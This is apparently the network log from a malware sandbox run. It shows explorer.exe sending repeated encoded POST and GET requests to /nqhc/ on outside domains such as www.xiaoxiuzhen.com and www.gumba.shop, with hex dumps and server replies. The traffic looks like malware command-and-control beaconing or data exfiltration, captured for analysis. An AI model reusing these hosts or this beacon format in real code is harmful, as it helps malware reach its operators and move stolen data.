                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 65 36 38 5f 71 59 4f 34 4f 4e 76 45 7e 36 4f 4e 55 2d 55 4a 30 70 62 36 48 46 45 66 47 65 78 41 5a 4b 31 4b 70 76 6b 34 50 46 38 58 73 31 71 4e 63 43 6f 30 48 59 53 62 76 67 71 46 63 59 48 6c 65 41 79 4c 63 6a 4c 4b 78 76 69 44 33 6f 67 6d 28 59 5a 4f 47 53 54 45 4a 50 4e 5f 47 48 73 6e 38 78 70 65 57 47 34 73 7a 6c 75 33 56 6b 5a 66 75 36 37 69 52 72 65 4b 31 4f 30 6d 73 6a 55 46 6d 51 4f 55 64 75 54 59 78 4c 42 59 6a 35 49 5f 6b 6d 54 49 71 72 41 70 41 31 52 45 38 75 48 4a 37 4c 76 67 47 39 30 75 4d 47 64 53 30 6b 48 4a 46 76 4d 58 48 78 37 55 7e 64 6e 76 7e 61 59 71 63 35 6e 4c 28 56 5a 6c 35 4e 34 6a 74 6c 65 62 51 50 63 39 6d 61 77 35 6b 66 53 6e 72 6c 34 57 38 42 33 61 54 66 6d 72 49 72 6d 6c 42 68 65 45 7a 38 44 38 70 45 41 74 51 32 63 64 72 34 44 4b 42 46 30 58 4a 7a 41 6e 44 33 70 39 59 55 39 61 46 66 53 73 4f 48 6f 58 6f 52 42 36 35 34 65 7a 79 49 65 4a 62 6d 64 48 52 2d 4a 66 32 44 4d 66 63 52 69 6f 37 7a 6b 77 51 71 28 68 4a 6b 79 45 63 47 6d 6c 74 70 6d 6b 64 73 59 57 57 53 63 79 4a 33 5a 72 71 6f 69 67 28 70 36 75 42 39 34 5a 37 4a 64 7a 75 70 56 57 35 79 4f 43 6a 70 49 62 34 64 67 46 41 31 44 43 55 77 46 69 35 30 46 52 72 4e 4a 54 4b 75 32 38 43 37 72 74 70 6e 48 57 49 35 4a 35 6b 6e 73 61 66 5f 58 4e 6e 30 59 34 6d 43 65 74 58 71 65 42 4c 4e 30 33 31 34 46 68 5a 6a 64 39 61 64 7e 64 4e 4a 39 76 6f 77 49 4c 6d 5a 76 7a 68 52 6f 61 34 6d 58 51 46 41 77 68 4e 41 68 31 69 68 7a 52 44 4e 57 5a 4e 53 77 58 69 6b 63 62 6f 74 6f 32 41 34 66 65 72 4c 57 74 56 66 6a 53 31 74 4a 30 68 48 63 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=AkaMX_QkdLfVe68_qYO4ONvE~6ONU-UJ0pb6HFEfGexAZK1Kpvk4PF8Xs1qNcCo0HYSbvgqFcYHleAyLcjLKxviD3ogm(YZOGSTEJPN_GHsn8xpeWG4szlu3VkZfu67iRreK1O0msjUFmQOUduTYxLBYj5I_kmTIqrApA1RE8uHJ7LvgG90uMGdS0kHJFvMXHx7U~dnv~aYqc5nL(VZl5N4jtlebQPc9maw5kfSnrl4W8B3aTfmrIrmlBheEz8D8pEAtQ2cdr4DKBF0XJzAnD3p9YU9aFfSsOHoXoRB654ezyIeJbmdHR-Jf2DMfcRio7zkwQq(hJkyEcGmltpmkdsYWWScyJ3Zrqoig(p6uB94Z7JdzupVW5yOCjpIb4dgFA1DCUwFi50FRrNJTKu28C7rtpnHWI5J5knsaf_XNn0Y4mCetXqeBLN0314FhZjd9ad~dNJ9vowILmZvzhRoa4mXQFAwhNAh1ihzRDNWZNSwXikcboto2A4ferLWtVfjS1tJ0hHc.
                                                                                                                                                                                    Nov 21, 2022 19:21:06.471455097 CET712INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:06 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    17192.168.11.204984038.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:08.456604958 CET715OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.xiaoxiuzhen.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.xiaoxiuzhen.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.xiaoxiuzhen.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 41 6b 61 4d 58 5f 51 6b 64 4c 66 56 65 36 38 5f 71 59 4f 34 4f 4e 76 45 7e 36 4f 4e 55 2d 55 4a 30 70 62 36 48 46 45 66 47 65 35 41 59 38 70 4b 71 49 77 34 4f 46 38 58 69 56 71 4d 63 43 6f 70 48 5a 36 66 76 67 33 77 63 64 44 6c 65 52 69 4c 63 52 7a 4b 68 5f 69 47 34 49 67 34 30 34 59 4e 47 53 76 51 4a 50 5a 76 47 30 77 6e 39 32 56 65 63 52 73 76 37 56 75 78 56 6b 5a 62 39 71 37 71 52 72 4b 61 31 4f 34 6d 73 6c 63 46 6e 69 47 55 66 39 37 59 38 37 42 58 34 70 49 4f 75 47 53 68 71 72 55 62 41 31 52 79 38 73 72 4a 37 4d 37 67 48 36 67 70 4d 6d 64 53 33 6b 47 66 42 76 49 62 48 78 58 63 7e 63 6a 76 7e 64 63 71 61 5a 6e 4c 76 68 74 36 37 74 35 71 67 46 66 5a 64 76 51 6c 6d 65 67 4c 6b 61 43 6e 72 56 73 57 38 79 66 61 66 65 6d 72 55 62 6d 6e 65 52 65 58 34 63 44 34 70 45 51 50 51 32 38 6e 72 5f 37 4b 43 6b 34 58 62 43 41 6d 55 6e 70 42 58 30 38 65 53 76 58 34 4f 45 51 4c 6f 52 42 71 35 36 79 7a 31 34 75 4a 4a 69 4a 47 63 4f 49 32 71 44 4e 59 57 78 75 6d 37 33 4d 34 51 71 33 50 4a 6e 7e 45 66 6d 6d 6c 6f 4b 7e 6e 58 63 59 4d 61 79 64 72 48 58 5a 43 71 6f 7e 38 28 74 72 62 42 4e 55 5a 36 39 35 7a 69 5a 56 4a 70 53 4f 47 73 4a 49 64 38 64 67 46 41 31 66 57 55 77 35 69 35 6c 39 52 70 36 74 54 50 35 69 38 41 37 72 72 70 6e 48 39 49 35 55 46 6b 6b 4d 6b 66 37 71 6f 6e 78 67 34 6c 57 61 74 44 4c 65 43 62 4e 30 34 78 34 46 32 58 44 51 37 61 64 69 46 4e 4e 68 5f 6f 43 4d 4c 6c 5a 66 7a 6c 52 6f 56 74 32 58 58 53 77 78 34 48 67 38 71 69 67 65 70 44 4f 4c 63 4e 56 30 58 67 54 64 45 74 74 6b 5f 53 62 28 46 76 73 43 38 54 63 58 36 6d 64 52 49 30 79 77 70 4a 51 65 4f 32 37 6f 36 48 62 59 77 5a 66 44 36 75 47 64 4b 43 43 6a 7a 6c 48 78 48 6b 4e 39 46 58 4a 70 63 66 58 59 63 68 45 53 56 70 31 47 64 68 65 48 48 6a 79 4b 48 79 79 33 48 75 6b 32 6a 6d 74 63 48 56 4e 74 7a 4a 44 58 56 50 7a 43 64 55 30 58 53 63 43 44 4c 61 34 58 34 36 4e 39 5f 6b 6d 62 63 75 6a 44 63 53 43 62 66 71 52 42 62 47 42 35 50 47 38 74 43 53 6c 4e 5a 4c 4b 31 50 70 46 7a 55 7a 53 4c 47 58 46 52 31 4c 61 48 6c 6f 59 79 39 47 7a 67 54 43 57 78 30 44 4a 76 51 50 6c 33 48 48 33 7e 5f 6b 59 35 49 73 7a 75 58 30 79 71 68 45 33 55 54 56 47 44 4a 28 58 55 7a 62 38 63 51 36 79 43 54 74 30 58 78 36 43 5a 72 68 59 37 73 42 41 68 74 79 34 30 36 50 45 61 6c 30 6e 71 62 4c 71 6f 50 6d 6f 45 50 78 7a 4d 64 65 77 36 75 70 51 77 46 39 75 32 31 35 51 4c 76 62 36 28 32 5a 6b 73 47 50 69 75 43 58 37 38 4e 38 45 69 71 6c 55 66 76 7a 4e 69 35 45 67 79 39 37 62 47 47 61 64 69 69 49 4d 48 66 6e 6f 6c 64 42 67 7a 5a 73 70 6b 75 35 42 4a 6b 47 69 31 51 4f 78 6f 4f 28 4c 55 72 43 76 6f 66 61 49 35 49 69 64 38 72 69 4e 55 69 53 52 78 35 48 30 79 36 6b 6e 39 52 71 48 6f 57 49 73 4d 36 67 71 62 6f 78 30 6c 67 55 70 6f 4e 45 6a 6f 73 42 77 62 57 61 74 35 4a 46 59 76 65 69 6f 7e 2d 7a 30 50 4b 76 66 64 54 74 73 37 79 55 5a 77 74 70 70 30 41 62 57 79 72 50 56 65 30 54 55 4c 54 48 51 4c 4f 35 2d 6e 4f 44 65 42 54 34 42 4b 31 45 42 6a 75 7a 31 51 36 49 7a 65 6f 74 36 6c 71 77 52 43 62 69 33 66 65 33 2d 6d 6d 39 6b 6b 36 6d 61 79 43 4c 67 64 57 41 5f 6f 49 55 42 6d 6b 39 56 6c 6c 35 64 69 73 7e 58 38 46 67 64 41 54 7a 35 78 78 6d 37 7e 6e 54 50 30 53 5a 44 47 69 39 63 67 6e 31 74 4f 56 49 41 42 45 37 55 37 57 58 75 37 2d 79 48 57 75 63 6f 57 57 7e 6d 4f 62 42 39 36 6d 45 42 65 45 48 44 6c 43 49 33 47 6c 34 30 6f 31 74 6a 54 46 57 72 76 30 4d 5f 75 6b 36 6b 65 49 32 74 62 64 33 53 4f 57 73 68 39 69 31 65 7a 34 56 73 72 4c 34 5f 76 69 63 42 71 6e 51 59 41 31 6c 57 7e 31 79 52 35 45 66 59 69 56 28 51 71 4a 6f 6e 38 75 61 64 43 4e 6e 50 61 39 35 62 28 57 78 4c 6c 6d 33 47 77 43 4d 4b 31 57 72 67 4b 75 65 47 68 6a 67 62 67 56 46 4d 4f 70 47 55 73 55 6e 46 4f 4f 63 4e 6d 41 6a 57 67 2d 53 30 50 4d 44 6f 45 37 69 55 43 78 71 41 51 78 4f 44 43 6f 61 62 65 34 69 64 30 72 76 30 53 50 61 77 37 7a 64 7a 34 74 49 65 67 48 33 79 6d 37 62 73 57 6f 64 4d 79 69 6c 68 43 52 6e 52 74 30 56 49 34 58 71 63 63 30 6d 43 43 43 62 75 62 66 66 38 67 59 54 30 59 71 75 4c 70 65 31 59 7a 4c 6b 31 51 2d 36 44 70 6d 70 56 49 44 4f 64 68 59 70 43 5a 45 47 35 48 4f 79 46 48 6b 75 78 37 50 49 35 44 66 41 45 31 6c 7e
                                                                                                                                                                                    Data Ascii: r4txB=AkaMX_QkdLfVe68_qYO4ONvE~6ONU-UJ0pb6HFEfGe5AY8pKqIw4OF8XiVqMcCopHZ6fvg3wcdDleRiLcRzKh_iG4Ig404YNGSvQJPZvG0wn92VecRsv7VuxVkZb9q7qRrKa1O4mslcFniGUf97Y87BX4pIOuGShqrUbA1Ry8srJ7M7gH6gpMmdS3kGfBvIbHxXc~cjv~dcqaZnLvht67t5qgFfZdvQlmegLkaCnrVsW8yfafemrUbmneReX4cD4pEQPQ28nr_7KCk4XbCAmUnpBX08eSvX4OEQLoRBq56yz14uJJiJGcOI2qDNYWxum73M4Qq3PJn~EfmmloK~nXcYMaydrHXZCqo~8(trbBNUZ695ziZVJpSOGsJId8dgFA1fWUw5i5l9Rp6tTP5i8A7rrpnH9I5UFkkMkf7qonxg4lWatDLeCbN04x4F2XDQ7adiFNNh_oCMLlZfzlRoVt2XXSwx4Hg8qigepDOLcNV0XgTdEttk_Sb(FvsC8TcX6mdRI0ywpJQeO27o6HbYwZfD6uGdKCCjzlHxHkN9FXJpcfXYchESVp1GdheHHjyKHyy3Huk2jmtcHVNtzJDXVPzCdU0XScCDLa4X46N9_kmbcujDcSCbfqRBbGB5PG8tCSlNZLK1PpFzUzSLGXFR1LaHloYy9GzgTCWx0DJvQPl3HH3~_kY5IszuX0yqhE3UTVGDJ(XUzb8cQ6yCTt0Xx6CZrhY7sBAhty406PEal0nqbLqoPmoEPxzMdew6upQwF9u215QLvb6(2ZksGPiuCX78N8EiqlUfvzNi5Egy97bGGadiiIMHfnoldBgzZspku5BJkGi1QOxoO(LUrCvofaI5Iid8riNUiSRx5H0y6kn9RqHoWIsM6gqbox0lgUpoNEjosBwbWat5JFYveio~-z0PKvfdTts7yUZwtpp0AbWyrPVe0TULTHQLO5-nODeBT4BK1EBjuz1Q6Izeot6lqwRCbi3fe3-mm9kk6mayCLgdWA_oIUBmk9Vll5dis~X8FgdATz5xxm7~nTP0SZDGi9cgn1tOVIABE7U7WXu7-yHWucoWW~mObB96mEBeEHDlCI3Gl40o1tjTFWrv0M_uk6keI2tbd3SOWsh9i1ez4VsrL4_vicBqnQYA1lW~1yR5EfYiV(QqJon8uadCNnPa95b(WxLlm3GwCMK1WrgKueGhjgbgVFMOpGUsUnFOOcNmAjWg-S0PMDoE7iUCxqAQxODCoabe4id0rv0SPaw7zdz4tIegH3ym7bsWodMyilhCRnRt0VI4Xqcc0mCCCbubff8gYT0YquLpe1YzLk1Q-6DpmpVIDOdhYpCZEG5HOyFHkux7PI5DfAE1l~81Bu2AxsMYWtPUWiwzjRzyziREHFfQ0Hqf9M-zhYg2-29JKQ-1VKNq_6f3K3cJKdQpTaCp5BtEg8-tA0N1HMR21K85bfYijlfFcppg-hONfCJ3CyLXKdVkJ3oe7QNQDXq6_dtar4XJB3eBwfceAuZSLQDr5LWBGpWLJsYBNIvpb6QxlsgKSZIhYe3uJYYsH73SxgcQEZXcz91MgbyWlen75Ss8_57KuKXqFDwfq2nAt7oSYUbb3CrrUwaP9z_Gh9WHe3ukzpRXr0cXVhwKBlhdSDVI8bOJhg0RIzpthgdGkSg6v~ccqGcuzj11uBa1rw2uIGWusAIaJ6dVTWwY2z_0vvT(SxxE2xogwFEFyxVzPghHGopetkplG(cspg70chkYLY0z9DHDFP8O5oebmtSUltMmp5LlVY5zvxI(_mzFJM-JmV8pIKZP2lOldZX8YytCcnUEr5Mi-kSLcnG7FtSzgOMRvUnxTztM4R0E2jz7WeMwgpELOiNmCNGjOJ5dDgVj0EhCoko2UBpp5GEYkKa9buWMTRpTb7hJuNb61S2Tp9iG8r8k2fZ2G6ywi0oT3B9rTK2c0qGiv70o8nPdNL3W1e_gFFtkF4SUt9iEiuVz6ksIxrVT9mywjDgjxX2~EpTTDKSDQjwqW67mEqGfoD6NwlO1xfpgp2jBaoypNTNedjtdPpW2tnFAGUw6kBMS2E4o8EAMUVT~1zvrhWW4-aqpqaKjuK1ZugpJ1dxKrYyOEytcscRVZZrqVIGeJH9B1lzv5zfhkJUVLsNgyaQMeIfNUQgJ5rohKUrE7g-e
                                                                                                                                                                                    Nov 21, 2022 19:21:08.456729889 CET725OUTData Raw: 79 47 74 56 71 4c 62 7a 33 32 6b 6c 39 46 41 58 32 74 4f 63 53 66 69 44 34 4f 4a 59 71 33 2d 71 4e 39 6d 65 49 4f 70 78 2d 52 54 70 36 64 42 46 34 36 33 28 6c 65 36 31 78 4d 2d 45 4c 44 67 52 44 58 63 53 61 7a 67 55 46 65 47 69 5f 45 73 57 34 79
                                                                                                                                                                                    Data Ascii: yGtVqLbz32kl9FAX2tOcSfiD4OJYq3-qN9meIOpx-RTp6dBF463(le61xM-ELDgRDXcSazgUFeGi_EsW4ydQMt6qooIFqhwf-c3UROILsyvi3W2lwePEGyIx-MB~sMiPW2cRFKrJTUioQSqsDyKqutrtIWrOUrnMcARkPY-mqPpH67c8bheXIwcmog6A78L(SZJ42N5R2xpJ3jh1PkWCRwPsd3I3wP9406TDx1VLB3xLzjrIE~n
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620088100 CET728OUTData Raw: 78 48 43 33 74 72 54 67 42 61 6a 79 72 35 74 45 37 76 6a 69 4e 7e 54 77 2d 4b 72 53 4e 48 45 38 45 67 51 77 52 4a 47 78 52 59 38 36 4b 63 51 39 4a 28 65 4b 59 4f 44 61 31 68 4e 34 35 6b 48 32 36 62 4e 7e 52 70 6d 55 6d 78 49 78 56 28 6c 47 49 59
                                                                                                                                                                                    Data Ascii: xHC3trTgBajyr5tE7vjiN~Tw-KrSNHE8EgQwRJGxRY86KcQ9J(eKYODa1hN45kH26bN~RpmUmxIxV(lGIYjCnnbCdnlAEeL2EU1eo1FHTVVWaPhQcP_xXVMrFzZvhA-LKRntZ4FiLh4Ca~O0jZq~if7pmo8z0LkfyC1Ywan82V5hfa-qhAFCpEz9cDkD2jHWmxNGjn_VuwYZql1NTjY1OAX4eXSMOXzU3WoqoAEseQ-MZ7QM0R8
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620249987 CET736OUTData Raw: 39 75 6d 56 64 46 65 79 50 30 53 33 55 5a 38 39 54 66 78 49 7a 46 52 46 30 51 59 7a 59 34 41 52 34 49 52 4c 38 43 5a 50 70 78 67 67 59 71 67 7e 5a 58 46 6e 6d 32 61 49 62 61 46 56 32 6e 55 74 2d 62 30 34 52 55 38 6c 63 64 51 4c 48 76 47 31 2d 52
                                                                                                                                                                                    Data Ascii: 9umVdFeyP0S3UZ89TfxIzFRF0QYzY4AR4IRL8CZPpxggYqg~ZXFnm2aIbaFV2nUt-b04RU8lcdQLHvG1-R3EKffbMc4eR0dWh8wSCIWEHbyeZuQQOHdPMPDPTXRnAT8N6z_jU~tDO3FQUYfWK4IuPXr0F3va2sdgCSUyxM2PzvSmA(outHbFP7v4wPGQ8bNP0ys2yEDPscLC-D0niiKV_L63Neh(MVJ0-I1KN(DOh0l8w12JbJT
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620412111 CET738OUTData Raw: 56 79 66 73 42 69 32 74 69 30 38 49 59 55 78 4d 36 6f 56 72 66 37 6c 62 63 66 69 63 76 31 6c 4b 63 52 59 76 35 73 71 59 45 77 55 51 56 30 31 6f 50 70 74 59 59 45 51 70 55 75 6f 45 47 5a 70 69 74 59 57 39 35 28 43 4d 51 39 32 72 70 4f 37 7e 4c 37
                                                                                                                                                                                    Data Ascii: VyfsBi2ti08IYUxM6oVrf7lbcficv1lKcRYv5sqYEwUQV01oPptYYEQpUuoEGZpitYW95(CMQ92rpO7~L7ETBJM1j42hxWfvgseNYULuawijE1IChJm4oMdSuDqpXr8d_b9rsITTl6Sj7HEW5kY~PO0o7AcyZsjZsR2j9GU9SWhE5UA9Op18SMrhnnab7OlrCfsIe3GaChH5ynhQJJHCm8VIoRroWQux144z8qVGClyYHpes9c2
                                                                                                                                                                                    Nov 21, 2022 19:21:08.620790958 CET741OUTData Raw: 65 4d 6c 52 66 4e 53 35 37 51 64 51 4d 31 61 47 65 6d 4f 43 7a 71 30 55 61 67 77 61 36 63 37 56 44 7a 35 30 6c 56 7a 46 76 31 52 7a 7a 58 4d 4c 4d 75 73 55 53 37 38 59 30 34 70 68 5f 35 42 37 62 50 6f 7e 33 51 43 36 6d 67 33 6e 33 34 51 28 71 36
                                                                                                                                                                                    Data Ascii: eMlRfNS57QdQM1aGemOCzq0Uagwa6c7VDz50lVzFv1RzzXMLMusUS78Y04ph_5B7bPo~3QC6mg3n34Q(q6eRLAmlzn3Jsn3KSH5uUXLlQtAnPCZ17iA(28ry9dzw-AXuE6jQeC4ow0nO8ar78CQ(OAyits4tixjTEBdeH4QCedcR-ltxJGxzDBFdPNbq6XM4K9iuhLDrFH8If(SS-yZv7lD~JsxEKF0pU2p~yRRNpw1~N~gXJT0
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621170998 CET744OUTData Raw: 69 45 4b 50 50 68 6a 68 72 36 56 72 63 74 46 51 33 53 68 78 58 77 47 78 6e 66 2d 67 52 49 71 61 41 6a 35 4d 56 7a 37 56 6f 68 4e 70 4a 4e 6d 51 4f 64 44 32 30 4a 30 71 4e 28 36 61 7a 68 5f 6c 46 68 78 70 4a 64 67 28 51 5a 69 43 69 31 4d 64 64 7e
                                                                                                                                                                                    Data Ascii: iEKPPhjhr6VrctFQ3ShxXwGxnf-gRIqaAj5MVz7VohNpJNmQOdD20J0qN(6azh_lFhxpJdg(QZiCi1Mdd~Jc-SflFEKpsKVrTQZ5VXfd0O3eEtMrk8i3anJToHuP5npsPqRbm568wsCwx9bXWWCnNUWapvEz2xi1IFv2MxaLTNmdAqIBXCIJCuFzE9KJb3dIR4OzjKSYM960MxxVfjv7wySJ-5Otzir5MI0jzFNRTl3GkYMOPyI
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621341944 CET746OUTData Raw: 64 39 4a 55 50 39 46 6b 55 7e 62 66 39 43 56 43 78 63 5f 58 71 50 42 69 6c 33 32 75 63 42 41 61 6d 4e 37 66 63 37 54 71 67 6b 4e 6a 63 47 6c 71 5f 4c 30 4c 68 4d 6f 42 43 62 4f 48 57 7e 53 78 62 66 5f 35 4a 77 79 79 5f 47 32 67 6a 62 73 5a 58 4e
                                                                                                                                                                                    Data Ascii: d9JUP9FkU~bf9CVCxc_XqPBil32ucBAamN7fc7TqgkNjcGlq_L0LhMoBCbOHW~Sxbf_5Jwyy_G2gjbsZXN7eyEv2vyg4PJtAIrFXOsC4pPvO-RTGCKd36Hym4(vIo7Qhnu34sRqQNb4tEvTz27NP_KqlpX83N9fvzC4GsCK5iBox3ttD62osZJX1LNyWrADs9FzX3OtlrNPEMSf38(GYq~gsFdAQRM_1TufqU9vMfVYDEzZdhu4
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621678114 CET749OUTData Raw: 5f 6e 73 69 41 51 7a 4b 5f 61 55 78 34 65 4f 4f 7a 76 58 4e 68 50 39 34 38 69 5a 70 53 66 64 57 73 36 53 41 53 47 68 73 41 75 62 66 6c 58 58 67 74 34 5f 43 41 7e 47 76 43 45 51 45 33 75 52 56 30 36 66 5a 63 35 73 62 37 4d 58 4f 30 6b 46 78 5f 6d
                                                                                                                                                                                    Data Ascii: _nsiAQzK_aUx4eOOzvXNhP948iZpSfdWs6SASGhsAubflXXgt4_CA~GvCEQE3uRV06fZc5sb7MXO0kFx_mG7lo57LpowxiwFCsxfYaGAls4rmHQSIEx80tfgALljwWjae0Ra5fmeXWlEFYT7IvcctVnXSQ3BcVQjhxZnC1Fmp2Tlx5cUBGkJu4LF7fp6CYA4Oa-D04rSRk8ittkk9iH5LqG4W(VHZfRo_ob7zaa8OuWpaD1ttsO
                                                                                                                                                                                    Nov 21, 2022 19:21:08.621849060 CET751OUTData Raw: 37 7a 68 71 49 7a 50 55 59 34 41 50 32 4d 70 75 66 75 6f 34 74 76 5f 51 45 57 78 41 38 37 58 7a 31 4a 52 46 45 72 38 68 37 6c 79 46 5a 7a 32 79 74 5a 6a 55 77 7e 6a 64 55 75 73 76 45 35 74 73 56 28 47 68 36 62 65 79 56 46 7a 4e 52 44 6e 68 6a 56
                                                                                                                                                                                    Data Ascii: 7zhqIzPUY4AP2Mpufuo4tv_QEWxA87Xz1JRFEr8h7lyFZz2ytZjUw~jdUusvE5tsV(Gh6beyVFzNRDnhjVSk6QY5VXZrw7Wf5XbmS7Let7wgH~Lod5tARA2X8YZpk~ayUEczRE9Czf6woYXLuy688GJB4MkIQXCSjDqEkBpTkz2HmQQp6ew(-(LZA26DWI749ZOuNV76W7pu3P6bK3ESMGubuJKVsYOgoI4(fn8VFGscH2vz5lz
                                                                                                                                                                                    Nov 21, 2022 19:21:08.783777952 CET759OUTData Raw: 34 59 2d 74 6e 59 57 6e 5f 76 44 64 4d 4d 67 34 5a 34 4c 54 36 77 4f 6e 31 44 2d 47 5f 59 50 76 7a 4c 6f 67 46 51 45 41 53 6d 48 72 41 63 73 74 6d 6f 63 61 70 66 4f 69 45 36 59 4c 6b 73 46 64 42 4d 75 59 57 4b 47 7a 41 69 43 35 6e 6c 76 65 61 64
                                                                                                                                                                                    Data Ascii: 4Y-tnYWn_vDdMMg4Z4LT6wOn1D-G_YPvzLogFQEASmHrAcstmocapfOiE6YLksFdBMuYWKGzAiC5nlvead3GwPti8EwArUoAYUEm_d0mG5LrA40IJwbICXFqFpkew~eFlGqlmmAMEP3H6I55t266fnpucJnL2ZDLxxbIKPtxWE_efIIXuIp8n7MEFn_sHcmlyOGw7SzK0BgUOaUFLHKxGUoVGBJhgZ0F0s-p0s_c18tDkcSwNZE
                                                                                                                                                                                    Nov 21, 2022 19:21:08.986124039 CET767INHTTP/1.1 400 Bad Request
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:08 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    18192.168.11.204984138.55.15.21480C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:10.643927097 CET768OUTGET /nqhc/?r4txB=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.xiaoxiuzhen.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:21:10.812271118 CET769INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:10 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 1.0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    19192.168.11.20498443.13.90.7680C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:21:16.190066099 CET776OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.gumba.shop
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 187
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.gumba.shop
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 64 70 30 6f 68 78 4d 4d 78 31 43 43 63 66 69 6c 50 4e 6b 5f 72 4f 56 4c 52 44 6a 6b 4e 55 41 6a 5a 44 48 75 62 63 57 4c 64 6e 35 46 64 6a 69 5a 51 34 38 4b 38 65 53 56 4f 50 28 2d 6e 39 67 34 6c 57 49 35 6b 31 55 31 78 53 43 31 58 75 41 43 32 31 56 6e 65 31 4f 61 38 30 72 65 39 38 53 5f 62 72 28 4a 28 37 33 50 31 4d 4d 43 71 36 54 67 4b 76 58 54 49 76 79 65 7a 47 61 63 28 30 28 64 4b 58 67 71 52 73 73 34 55 6d 55 32 6b 51 4a 76 61 2d 4f 47 30 6e 56 79 72 71 55 6a 65 33 45 37 4d 44 62 43 33 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=S6tbconk9Vd-dp0ohxMMx1CCcfilPNk_rOVLRDjkNUAjZDHubcWLdn5FdjiZQ48K8eSVOP(-n9g4lWI5k1U1xSC1XuAC21Vne1Oa80re98S_br(J(73P1MMCq6TgKvXTIvyezGac(0(dKXgqRss4UmU2kQJva-OG0nVyrqUje3E7MDbC3w).
                                                                                                                                                                                    Nov 21, 2022 19:21:16.338378906 CET777INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:21:16 GMT
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Content-Length: 153
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Server: nginx/1.16.1
